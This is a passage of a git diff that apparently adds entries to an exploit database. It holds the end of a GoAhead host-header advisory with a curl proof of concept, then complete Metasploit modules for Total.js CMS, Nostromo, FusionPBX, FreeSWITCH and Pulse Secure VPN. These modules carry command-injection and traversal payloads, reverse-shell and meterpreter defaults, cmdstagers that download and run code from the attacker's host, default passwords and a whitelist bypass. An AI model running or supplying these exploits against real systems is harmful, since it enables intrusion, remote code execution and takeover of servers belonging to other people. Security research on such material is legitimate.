+restoreUrl=&errorCollector=&ModuleTable=OK&rlPhdModuleTable%24VT=OK&rlPhdModuleStackUnit%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleIndex%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleType%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleNumberOfPorts%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&ModuleTable%24endVT=OK&rlPhdModuleStackUnit%24repeat%3F1=1&rlPhdModuleIndex%24repeat%3F1=1&rlPhdModuleType%24repeat%3F1=47&rlPhdModuleNumberOfPorts%24repeat%3F1=28&ModuleTable%24endRepeat%3F1=OK&userName%24query=%24enab15%24&password%24query=admin&x=0&y=0
+
+Response:
+
+HTTP/1.1 302 Redirect
+Server: GoAhead-Webs
+Date: Sat Oct 14 19:04:59 2006
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: http://google.com:443/config/accessnotallowedpage.htm
+
+<html><head></head><body>
+                        This document has moved to a new <a href="http://google.com:443/config/accessnotallowedpage.htm">location</a>.
+                        Please update your documents to reflect the new location.
+                        </body></html>
+
+POC: 3 
+
+curl -k --header "Host: attacker domain" "victim's url"
+
+
+Initial Investigation:
+
+Potentially affected Part of the source code in GoAhead web server is in the ’http.c’ file, which contains 'host' parameter.
+https://github.com/embedthis/goahead/blob/master/src/http.c
\ No newline at end of file
diff --git a/exploits/multiple/remote/47531.rb b/exploits/multiple/remote/47531.rb
new file mode 100755
index 000000000..aa42b6b58
--- /dev/null
+++ b/exploits/multiple/remote/47531.rb
@@ -0,0 +1,309 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Total.js CMS 12 Widget JavaScript Code Injection',
+      'Description'    => %q{
+        This module exploits a vulnerability in Total.js CMS. The issue is that a user with
+        admin permission can embed a malicious JavaScript payload in a widget, which is
+        evaluated server side, and gain remote code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Riccardo Krauter', # Original discovery
+          'sinn3r'            # Metasploit module
+        ],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+          [ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ],
+          [ 'Total.js CMS on Mac',   { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ]
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-15954'],
+          ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],
+          ['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8000,
+        },
+      'Notes'          =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => '2019-08-30', # Reported to seclist
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),
+        OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),
+        OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])
+      ])
+  end
+
+  class AdminToken
+    attr_reader :token
+
+    def initialize(cookie)
+      @token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first
+    end
+
+    def blank?
+      token.blank?
+    end
+  end
+
+  class Widget
+    attr_reader :name
+    attr_reader :category
+    attr_reader :source_code
+    attr_reader :platform
+    attr_reader :url
+
+    def initialize(p, u, stager)
+      @name = "p_#{Rex::Text.rand_text_alpha(10)}"
+      @category = 'content'
+      @platform = p
+      @url = u
+      @source_code  = %Q|<script total>|
+      @source_code << %Q|global.process.mainModule.require('child_process')|
+      @source_code << %Q|.exec("sleep 2;#{stager}");|
+      @source_code << %Q|</script>|
+    end
+  end
+
+  def check
+    code = CheckCode::Safe
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'admin', 'widgets')
+    })
+
+    unless res
+      vprint_error('Connection timed out')
+      return CheckCode::Unknown
+    end
+
+    # If the admin's login page is visited too many times, we will start getting
+    # a 401 (unauthorized response). In that case, we only have a header to work
+    # with.
+    if res.headers['X-Powered-By'].to_s == 'Total.js'
+      code = CheckCode::Detected
+    end
+
+    # If we are here, then that means we can still see the login page.
+    # Let's see if we can extract a version.
+    html = res.get_html_document
+    element = html.at('title')
+    return code unless element.respond_to?(:text)
+    title = element.text.scan(/CMS v([\d\.]+)/).flatten.first
+    return code unless title
+    version = Gem::Version.new(title)
+
+    if version <= Gem::Version.new('12')
+      # If we are able to check the version, we could try the default cred and attempt
+      # to execute malicious code and see how the application responds. However, this
+      # seems to a bit too aggressive so I'll leave that to the exploit part.
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def auth(user, pass)
+    json_body = { 'name' => user, 'password' => pass }.to_json
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'api', 'login', 'admin'),
+      'ctype'  => 'application/json',
+      'data'   => json_body
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+
+    json_res = res.get_json_document
+    cookies = res.get_cookies
+    # If it's an array it could be an error, so we are specifically looking for a hash.
+    if json_res.kind_of?(Hash) && json_res['success']
+      token = AdminToken.new(cookies)
+      @admin_token = token
+      return token
+    end
+    fail_with(Failure::NoAccess, 'Invalid username or password')
+  end
+
+  def create_widget(admin_token)
+    platform = target.platform.names.first
+    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']
+    port = datastore['SRVPORT']
+    proto = datastore['SSL'] ? 'https' : 'http'
+    payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
+    url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}"
+    widget = Widget.new(platform, url, generate_cmdstager(
+        'Path' => "#{get_resource}/#{payload_name}",
+        'temp' => '/tmp',
+        'file' => payload_name
+      ).join(';'))
+
+    json_body = {
+      'name'     => widget.name,
+      'category' => widget.category,
+      'body'     => widget.source_code
+    }.to_json
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
+      'cookie' => "__admin=#{admin_token.token}",
+      'ctype'  => 'application/json',
+      'data'   => json_body
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+
+    res_json = res.get_json_document
+    if res_json.kind_of?(Hash) && res_json['success']
+      print_good("Widget created successfully")
+    else
+      fail_with(Failure::Unknown, 'No success message in body')
+    end
+
+    widget
+  end
+
+  def get_widget_item(admin_token, widget)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
+      'cookie' => "__admin=#{admin_token.token}",
+      'ctype'  => 'application/json'
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+
+    res_json = res.get_json_document
+    count = res_json['count']
+    items = res_json['items']
+
+    unless count
+      fail_with(Failure::Unknown, 'No count key found in body')
+    end
+
+    unless items
+      fail_with(Failure::Unknown, 'No items key found in body')
+    end
+
+    items.each do |item|
+      widget_name = item['name']
+      if widget_name.match(/p_/)
+        return item
+      end
+    end
+
+    []
+  end
+
+  def clear_widget
+    admin_token = get_admin_token
+    widget = get_widget
+
+    print_status('Finding the payload from the widget list...')
+    item = get_widget_item(admin_token, widget)
+
+    json_body = {
+      'id'          => item['id'],
+      'picture'     => item['picture'],
+      'name'        => item['name'],
+      'icon'        => item['icon'],
+      'category'    => item['category'],
+      'datecreated' => item['datecreated'],
+      'reference'   => item['reference']
+    }.to_json
+
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
+      'cookie' => "__admin=#{admin_token.token}",
+      'ctype'  => 'application/json',
+      'data'   => json_body
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+
+    res_json = res.get_json_document
+    if res_json.kind_of?(Hash) && res_json['success']
+      print_good("Widget cleared successfully")
+    else
+      fail_with(Failure::Unknown, 'No success message in body')
+    end
+  end
+
+  def on_request_uri(cli, req)
+    print_status("#{cli.peerhost} requesting: #{req.uri}")
+
+    if req.uri =~ /p_.+/
+      payload_exe = generate_payload_exe(code: payload.encoded)
+      print_status("Sending payload to #{cli.peerhost}")
+      send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'})
+      return
+    end
+
+    send_not_found(cli)
+  end
+
+  def on_new_session(session)
+    clear_widget
+  end
+
+  # This is kind of for cleaning up the wiget, because we cannot pass it as an
+  # argument in on_new_session.
+  def get_widget
+    @widget
+  end
+
+  # This is also kind of for cleaning up widget, because we cannot pass it as an
+  # argument directly
+  def get_admin_token
+    @admin_token
+  end
+
+  def exploit
+    user = datastore['TOTALJSUSERNAME']
+    pass = datastore['TOTALJSPASSWORD']
+    print_status("Attempting to authenticate with #{user}:#{pass}")
+    admin_token = auth(user, pass)
+    fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?
+    print_good("Authenticatd as: #{user}:#{pass}")
+    print_status("Creating a widget...")
+    @widget = create_widget(admin_token)
+    super
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47573.rb b/exploits/multiple/remote/47573.rb
new file mode 100755
index 000000000..cbf10c8f6
--- /dev/null
+++ b/exploits/multiple/remote/47573.rb
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Nostromo Directory Traversal Remote Command Execution',
+      'Description'    => %q{
+          This module exploits a remote command execution vulnerability in
+        Nostromo <= 1.9.6. This issue is caused by a directory traversal
+        in the function `http_verify` in nostromo nhttpd allowing an attacker
+        to achieve remote code execution via a crafted HTTP request.
+      },
+      'Author'         =>
+        [
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>', # metasploit module
+          'sp0re', # original public exploit
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2019-16278'],
+          [ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'],
+        ],
+      'Platform'      => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux
+      'Arch'  => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
+      'Targets'        =>
+        [
+          ['Automatic (Unix In-Memory)',
+            {
+                'Platform' => 'unix',
+                'Arch'  => ARCH_CMD,
+                'Type'  => :unix_memory,
+                'DefaultOptions'  => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
+            }
+          ],
+          ['Automatic (Linux Dropper)',
+            {
+                'Platform' => 'linux',
+                'Arch'  => [ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
+                'Type'  => :linux_dropper,
+                'DefaultOptions'  => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Oct 20 2019',
+      'DefaultTarget' => 0,
+      'Notes'         => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path),
+      }
+    )
+
+    unless res
+      vprint_error("Connection failed")
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200 and res.headers['Server'] =~ /nostromo [\d.]{5}/
+      /nostromo (?<version>[\d.]{5})/ =~ res.headers['Server']
+      if Gem::Version.new(version) <= Gem::Version.new('1.9.6')
+        return CheckCode::Appears
+      end
+    end
+
+    return CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts = {})
+    send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, '/.%0d./.%0d./.%0d./.%0d./bin/sh'),
+      'headers' => {'Content-Length:' => '1'},
+      'data'    => "echo\necho\n#{cmd} 2>&1"
+      }
+    )
+  end
+
+  def exploit
+    # These CheckCodes are allowed to pass automatically
+    checkcodes = [
+      CheckCode::Appears,
+      CheckCode::Vulnerable
+    ]
+
+    unless checkcodes.include?(check) || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    print_status("Configuring #{target.name} target")
+
+    case target['Type']
+    when :unix_memory
+      print_status("Sending #{datastore['PAYLOAD']} command payload")
+      vprint_status("Generated command payload: #{payload.encoded}")
+
+      res = execute_command(payload.encoded)
+
+      if res && datastore['PAYLOAD'] == 'cmd/unix/generic'
+        print_warning('Dumping command output in full response body')
+
+        if res.body.empty?
+          print_error('Empty response body, no command output')
+          return
+        end
+
+        print_line(res.body)
+      end
+    when :linux_dropper
+      print_status("Sending #{datastore['PAYLOAD']} command stager")
+      execute_cmdstager
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47697.rb b/exploits/multiple/remote/47697.rb
new file mode 100755
index 000000000..d504623fe
--- /dev/null
+++ b/exploits/multiple/remote/47697.rb
@@ -0,0 +1,164 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'FusionPBX Operator Panel exec.php Command Execution',
+      'Description'     => %q{
+        This module exploits an authenticated command injection vulnerability
+        in FusionPBX versions 4.4.3 and prior.
+
+        The `exec.php` file within the Operator Panel permits users with
+        `operator_panel_view` permissions, or administrator permissions,
+        to execute arbitrary commands as the web server user by sending
+        a `system` command to the FreeSWITCH event socket interface.
+
+        This module has been tested successfully on FusionPBX version
+        4.4.1 on Ubuntu 19.04 (x64).
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Dustin Cobb', # Discovery and exploit
+          'bcoles'       # Metasploit
+        ],
+      'References'      =>
+        [
+          ['CVE', '2019-11409'],
+          ['EDB', '46985'],
+          ['URL', 'https://blog.gdssecurity.com/labs/2019/6/7/rce-using-caller-id-multiple-vulnerabilities-in-fusionpbx.html'],
+          ['URL', 'https://github.com/fusionpbx/fusionpbx/commit/e43ca27ba2d9c0109a6bf198fe2f8d79f63e0611']
+        ],
+      'Platform'        => %w[unix linux],
+      'Arch'            => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Payload'         => {'BadChars' => "\x00\x0a\x0d\x27\x5c"},
+      'CmdStagerFlavor' => %w[curl wget],
+      'Targets'         =>
+        [
+          ['Automatic (Unix In-Memory)',
+            'Platform'       => 'unix',
+            'Arch'           => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
+            'Type'           => :unix_memory
+          ],
+          ['Automatic (Linux Dropper)',
+            'Platform'       => 'linux',
+            'Arch'           => [ARCH_X86, ARCH_X64],
+            'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
+            'Type'           => :linux_dropper
+          ]
+        ],
+      'Privileged'      => false,
+      'DefaultOptions'  => { 'SSL' => true, 'RPORT' => 443 },
+      'DisclosureDate'  => '2019-06-06',
+      'DefaultTarget'   => 0))
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to FusionPBX', '/']),
+      OptString.new('USERNAME', [true, 'The username for FusionPBX']),
+      OptString.new('PASSWORD', [true, 'The password for FusionPBX'])
+    ]
+  end
+
+  def login(user, pass)
+    vprint_status "Authenticating as user '#{user}'"
+
+    vars_post = {
+      username: user,
+      password: pass,
+      path: ''
+    }
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'core/user_settings/user_dashboard.php'),
+      'vars_post' => vars_post
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    if res.code == 302 && res.headers['location'].include?('login.php')
+      fail_with Failure::NoAccess, "Login failed for user '#{user}'"
+    end
+
+    unless res.code == 200
+      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
+    end
+
+    cookie = res.get_cookies.to_s.scan(/PHPSESSID=(.+?);/).flatten.first
+
+    unless cookie
+      fail_with Failure::UnexpectedReply, 'Failed to retrieve PHPSESSID cookie'
+    end
+
+    print_good "Authenticated as user '#{user}'"
+
+    cookie
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.body.include?('FusionPBX')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts = {})
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'app/operator_panel/exec.php'),
+      'cookie'  => "PHPSESSID=#{@cookie}",
+      'vars_get' => {'cmd' => "bg_system #{cmd}"}
+    }, 5)
+
+    unless res
+      return if session_created?
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 200
+      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
+    end
+
+    if res.body.include? 'access denied'
+      fail_with Failure::NoAccess, "User #{datastore['USERNAME']} does not have permission to access the Operator Panel"
+    end
+
+    res
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
+    end
+
+    @cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    print_status "Sending payload (#{payload.encoded.length} bytes) ..."
+
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(:linemax => 1_500)
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47698.rb b/exploits/multiple/remote/47698.rb
new file mode 100755
index 000000000..bfd7c0bb1
--- /dev/null
+++ b/exploits/multiple/remote/47698.rb
@@ -0,0 +1,169 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'FreeSWITCH Event Socket Command Execution',
+      'Description'     => %q{
+        This module uses the FreeSWITCH event socket interface
+        to execute system commands using the `system` API command.
+
+        The event socket service is enabled by default and listens
+        on TCP port 8021 on the local network interface.
+
+        This module has been tested successfully on FreeSWITCH versions:
+
+        1.6.10-17-726448d~44bit on FreeSWITCH-Deb8-TechPreview virtual machine;
+        1.8.4~64bit on Ubuntu 19.04 (x64); and
+        1.10.1~64bit on Windows 7 SP1 (EN) (x64).
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          => ['bcoles'],
+      'References'      =>
+        [
+          ['CWE', '260'], # default password, configurable in event_socket.conf.xml
+          ['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']
+        ],
+      'Platform'        => %w[win linux unix bsd],
+      'Arch'            => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Payload'         => {'BadChars' => "\x00\x0a\x0d\x27\x5c"},
+      'CmdStagerFlavor' => %w[curl wget certutil vbs],
+      'Targets'         =>
+        [
+          ['Unix (In-Memory)',
+            'Platform'       => 'unix',
+            'Arch'           => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
+            'Type'           => :unix_memory
+          ],
+          ['Linux (Dropper)',
+            'Platform'       => 'linux',
+            'Arch'           => [ARCH_X86, ARCH_X64],
+            'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
+            'Type'           => :linux_dropper
+          ],
+          ['PowerShell (In-Memory)',
+            'Platform'       => 'win',
+            'Arch'           => [ARCH_X86, ARCH_X64],
+            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'},
+            'Type'           => :psh_memory
+          ],
+          ['Windows (In-Memory)',
+            'Platform'       => 'win',
+            'Arch'           => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/reverse_powershell'},
+            'Type'           => :win_memory
+          ],
+          ['Windows (Dropper)',
+            'Platform'       => 'win',
+            'Arch'           => [ARCH_X86, ARCH_X64],
+            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'},
+            'Type'           => :win_dropper
+          ]
+        ],
+      'Privileged'      => false,
+      'DefaultOptions'  => { 'RPORT' => 8021 },
+      'DisclosureDate'  => '2019-11-03',
+      'DefaultTarget'   => 0))
+    register_options [
+      OptString.new('PASSWORD', [true, 'FreeSWITCH event socket password', 'ClueCon'])
+    ]
+  end
+
+  def check
+    connect
+    banner = sock.get_once.to_s
+    disconnect
+
+    if banner.include?('Access Denied, go away.') || banner.include?('text/rude-rejection')
+      vprint_error 'Access denied by network ACL'
+      return CheckCode::Safe
+    end
+
+    unless banner.include?('Content-Type: auth/request')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
+  end
+
+  def auth(password)
+    sock.put "auth #{password}\n\n"
+    res = sock.get_once.to_s
+
+    unless res.include? 'Content-Type: command/reply'
+      fail_with Failure::UnexpectedReply, 'Unexpected reply'
+    end
+
+    unless res.include?('Reply-Text: +OK accepted')
+      fail_with Failure::NoAccess, 'Login failed'
+    end
+
+    print_status 'Login success'
+  end
+
+  def execute_command(cmd, opts = {})
+    api_function = opts[:foreground] ? 'system' : 'bg_system'
+
+    sock.put "api #{api_function} #{cmd}\n\n"
+    res = sock.get_once.to_s
+
+    unless res.include? 'Content-Type: api/response'
+      fail_with Failure::UnexpectedReply, 'Unexpected reply'
+    end
+
+    vprint_status "Response: #{res}"
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    connect
+    banner = sock.get_once.to_s
+
+    auth(datastore['PASSWORD'])
+
+    print_status "Sending payload (#{payload.encoded.length} bytes) ..."
+
+    case target['Type']
+    when :unix_memory
+      if datastore['PAYLOAD'] == 'cmd/unix/generic'
+        execute_command(payload.encoded, foreground: true)
+      else
+        execute_command(payload.encoded)
+      end
+    when :win_memory
+      if datastore['PAYLOAD'] == 'cmd/windows/generic'
+        execute_command(payload.encoded, foreground: true)
+      else
+        execute_command(payload.encoded)
+      end
+    when :psh_memory
+      execute_command(
+        cmd_psh_payload(
+          payload.encoded,
+          payload_instance.arch.first,
+          { :remove_comspec => true, :encode_final_payload => true }
+        )
+      )
+    when :linux_dropper
+      execute_cmdstager(:linemax => 1_500)
+    when :win_dropper
+      execute_cmdstager(:linemax => 1_500)
+    end
+  ensure
+    disconnect unless sock.nil?
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47700.rb b/exploits/multiple/remote/47700.rb
new file mode 100755
index 000000000..4e561189c
--- /dev/null
+++ b/exploits/multiple/remote/47700.rb
@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'               => 'Pulse Secure VPN Arbitrary Command Execution',
+      'Description'        => %q{
+        This module exploits a post-auth command injection in the Pulse Secure
+        VPN server to execute commands as root. The env(1) command is used to
+        bypass application whitelisting and run arbitrary commands.
+
+        Please see related module auxiliary/gather/pulse_secure_file_disclosure
+        for a pre-auth file read that is able to obtain plaintext and hashed
+        credentials, plus session IDs that may be used with this exploit.
+
+        A valid administrator session ID is required in lieu of untested SSRF.
+      },
+      'Author'             => [
+        'Orange Tsai', # Discovery (@orange_8361)
+        'Meh Chang',   # Discovery (@mehqq_)
+        'wvu'          # Module
+      ],
+      'References'         => [
+        ['CVE', '2019-11539'],
+        ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],
+        ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],
+        ['URL', 'https://hackerone.com/reports/591295']
+      ],
+      'DisclosureDate'     => '2019-04-24', # Public disclosure
+      'License'            => MSF_LICENSE,
+      'Platform'           => ['unix', 'linux'],
+      'Arch'               => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Privileged'         => true,
+      'Targets'            => [
+        ['Unix In-Memory',
+          'Platform'       => 'unix',
+          'Arch'           => ARCH_CMD,
+          'Type'           => :unix_memory,
+          'Payload'        => {
+            'BadChars'     => %Q(&*(){}[]`;|?\n~<>"'),
+            'Encoder'      => 'generic/none' # Force manual badchar analysis
+          },
+          'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}
+        ],
+        ['Linux Dropper',
+          'Platform'       => 'linux',
+          'Arch'           => [ARCH_X86, ARCH_X64],
+          'Type'           => :linux_dropper,
+          'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'}
+        ]
+      ],
+      'DefaultTarget'      => 1,
+      'DefaultOptions'     => {
+        'RPORT'            => 443,
+        'SSL'              => true,
+        'CMDSTAGER::SSL'   => true
+      },
+      'Notes'              => {
+        'Stability'        => [CRASH_SAFE],
+        'Reliability'      => [REPEATABLE_SESSION],
+        'SideEffects'      => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+        'RelatedModules'   => ['auxiliary/gather/pulse_secure_file_disclosure']
+      }
+    ))
+
+    register_options([
+      OptString.new('SID', [true, 'Valid admin session ID'])
+    ])
+  end
+
+  def post_auth?
+    true
+  end
+
+  def exploit
+    get_csrf_token
+
+    print_status("Executing #{target.name} target")
+
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(
+        flavor:   :curl,
+        noconcat: true
+      )
+    end
+  end
+
+  def get_csrf_token
+    @cookie = "DSID=#{datastore['SID']}"
+    print_good("Setting session cookie: #{@cookie}")
+
+    print_status('Obtaining CSRF token')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => diag_cgi,
+      'cookie' => @cookie
+    )
+
+    unless res && res.code == 200 && (@csrf_token = parse_csrf_token(res.body))
+      fail_with(Failure::NoAccess, 'Session cookie expired or invalid')
+    end
+
+    print_good("CSRF token: #{@csrf_token}")
+  end
+
+  def parse_csrf_token(body)
+    body.to_s.scan(/xsauth=([[:xdigit:]]+)/).flatten.first
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Prepend absolute path to curl(1), since it's not in $PATH
+    cmd.prepend('/home/bin/') if cmd.start_with?('curl')
+
+    # Bypass application whitelisting with permitted env(1)
+    cmd.prepend('env ')
+
+    vprint_status("Executing command: #{cmd}")
+    print_status("Yeeting exploit at #{full_uri(diag_cgi)}")
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => diag_cgi,
+      'cookie'    => @cookie,
+      'vars_get'  => {
+        'a'       => 'td', # tcpdump
+        'options' => sploit(cmd),
+        'xsauth'  => @csrf_token,
+        'toggle'  => 'Start Sniffing'
+      }
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Could not yeet exploit')
+    end
+
+    print_status("Triggering payload at #{full_uri(setcookie_cgi)}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => setcookie_cgi
+    }, 3.1337)
+
+    # 200 response code, yet 500 error in body
+    unless res && res.code == 200 && !res.body.include?('500 Internal Error')
+      print_warning('Payload execution may have failed')
+      return
+    end
+
+    print_good('Payload execution successful')
+
+    if datastore['PAYLOAD'] == 'cmd/unix/generic'
+      print_line(res.body.sub(/\s*<html>.*/m, ''))
+    end
+  end
+
+  def sploit(cmd)
+    %(-r$x="#{cmd}",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <)
+  end
+
+  def diag_cgi
+    '/dana-admin/diag/diag.cgi'
+  end
+
+  def setcookie_cgi
+    '/dana-na/auth/setcookie.cgi'
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47837.py b/exploits/multiple/remote/47837.py
new file mode 100755
index 000000000..445ab1f40
--- /dev/null
+++ b/exploits/multiple/remote/47837.py
